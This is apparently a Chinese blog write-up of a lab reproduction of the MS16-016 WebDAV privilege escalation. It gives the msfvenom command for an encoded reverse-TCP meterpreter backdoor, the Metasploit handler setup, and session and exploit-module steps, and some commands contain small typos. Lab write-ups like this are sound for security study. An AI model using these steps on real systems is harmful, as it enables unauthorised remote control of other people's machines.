CVE-2016-0051(WebDaV)漏洞复现

MS16-016(WebDaV)漏洞复现
目标机:win7x64 192.168.235.142
攻击机:kali 192.168.235.137
1、 确定目标主机和攻击机能够ping通
在这里插入图片描述
在这里插入图片描述
2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端口号) -e(-e表示encoder编码) x86/shinkata_ga_nai -i(-I 编码次数) 5 -b(将制定特征进行再编码) ‘x00’ -f(生成文件的格式) exe -o(生成路径及文件名) /root/1.exe
在这里插入图片描述
3、打开win7主机上的winSCP软件用来模仿文件下载
在这里插入图片描述
4、登录192.168.235.137 端口默认22 用来下载文件
在这里插入图片描述
5、已经登录到这个服务器进行文件下载
在这里插入图片描述
将文件1.exe的文件下载到桌面上木马文件已经上传
6、启动msf 终端输入msfconsole
在这里插入图片描述
7、终端中输入use exploit/multi/handler 进入到该模块 show options查看选项
在这里插入图片描述
8、set payload windows/meterpreter/reverse_tcp设置生成木马时 用的payload
在这里插入图片描述
9、show options 设置本地IP 端口 set LHOST 192.168.235.137 set LPORT 2222
在这里插入图片描述
在这里插入图片描述
10、show options 查看配置后的信息
在这里插入图片描述
11、输入run开始监听目标机
在这里插入图片描述
12、双击win7上的1.exe返回kali一个会话
在这里插入图片描述
输入session -l 查看会话id 看到是1 输入session 1
得到meterpreter
在这里插入图片描述
13、输入sysinfo查看目标机信息
在这里插入图片描述
输入getuid 查看当前获取的用户权限
在这里插入图片描述
14、终端中输入ps 看见木马程序1.exe的进程id为 2924
在这里插入图片描述
15、输入migrate 1608尝试将其添加到mysqld 进程中
在这里插入图片描述结果权限不够
16、输入background转入后台.
在这里插入图片描述
17、下面我们进行提权 search ms16 搜索这个相关的模块
并切换到该模块
在这里插入图片描述
在这里插入图片描述
配置会话id
在这里插入图片描述
18、run进行攻击导致蓝屏

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值